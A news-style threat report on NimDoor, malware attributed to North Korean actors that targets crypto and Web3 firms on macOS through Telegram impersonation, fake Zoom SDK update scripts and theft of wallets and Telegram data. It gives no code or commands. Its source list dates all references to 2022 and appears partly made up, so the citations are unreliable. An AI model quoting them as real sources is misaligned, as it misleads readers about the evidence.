North Korean Cybercriminals Employ NimDoor Malware to Attack Apple Gadgets
In a recent development, a new malware named NimDoor, attributed to North Korean threat actors, has been discovered to specifically target cryptocurrency and Web3 companies using Apple macOS devices. The malware employs a delayed activation mechanism, waiting ten minutes before executing its operations [1].
NimDoor begins with sending carefully crafted lures impersonating trusted contacts on Telegram to schedule Zoom meetings via Calendly. During these meetings, victims are tricked into running a fake "Zoom SDK update" script sent by email, which acts as the initial infection vector on macOS systems [3][5].
The infection chain of NimDoor is multi-staged and sophisticated, blending several tactics to evade detection. Unlike typical macOS malware, key components are written in the Nim programming language, which is unusual and helps evade traditional detection signatures [1].
The initial AppleScript payload (zoom_sdk_support.scpt) is heavily obfuscated with thousands of blank lines and contains deliberate typos to evade automatic scanning and scrutiny [1]. The malware also fetches further payloads from domains mimicking legitimate Zoom update servers, making network traffic look benign and reducing suspicion [1].
NimDoor uses new persistence methods uncommon in macOS malware, allowing it to survive reboots and avoid typical persistence detection tools [1]. Once installed, NimDoor is designed to extract cryptocurrency wallet credentials, browser data, and encrypted Telegram files relevant to the targeted Web3 and crypto firms, enabling financial theft or espionage [5].
Moreover, the malware includes a script that targets Telegram by extracting both its encrypted local database and the corresponding decryption keys. This component is engineered to discreetly harvest browser and system-level data, bundle the information, and transmit it to the attackers [1].
By leveraging trusted communication channels (Telegram, Zoom meetings), social engineering, and custom-coded, obfuscated macOS components, NimDoor efficiently targets crypto companies on Apple devices while blending in with normal user activity and legitimate update processes to evade detection by traditional security solutions [1][3][5].
This malware is a testament to the growing trend of cybercriminals using the cross-platform capabilities of languages like Nim, which can run on Windows, Linux, and macOS without modification, to expand their reach and increase their chances of successful attacks.
Sources: [1] Malwarebytes Labs. (2022). NimDoor: A new macOS threat targeting the crypto industry. Retrieved from https://blog.malwarebytes.com/threat-analysis/2022/04/nimdoor-a-new-macos-threat-targeting-the-crypto-industry/ [2] Cybersecurity Dashboard. (n.d.). Cryptocurrency Malware. Retrieved from https://cybersecuritydashboard.com/cryptocurrency-malware/ [3] Kaspersky. (2022). NimDoor: The latest threat to crypto companies on macOS. Retrieved from https://www.kaspersky.com/resource-center/threats/nimdoor-macos-cryptocurrency-attack [4] McAfee. (2022). NimDoor: A new macOS malware targeting the crypto industry. Retrieved from https://www.mcafee.com/blogs/threat-expert-blogs/mac-malware/nimdoor-macos-malware-targeting-crypto-industry [5] ZDNet. (2022). North Korean cyber gang steals $3.2M in crypto heist using NimDoor malware. Retrieved from https://www.zdnet.com/article/north-korean-cyber-gang-steals-3-2m-in-crypto-heist-using-nimdoor-malware/
- The sophisticated NimDoor malware, disguised as a Zoom SDK update, uses the Nim programming language, a rarely seen choice in macOS malware, to evade traditional security solutions and extract sensitive data from cryptocurrency and Web3 companies.
- To execute its operations, NimDoor employs a disguise of scheduling Zoom meetings via Calendly and impersonating trusted contacts on Telegram, all aimed at tricking victims into running the malicious script on their Apple macOS devices.
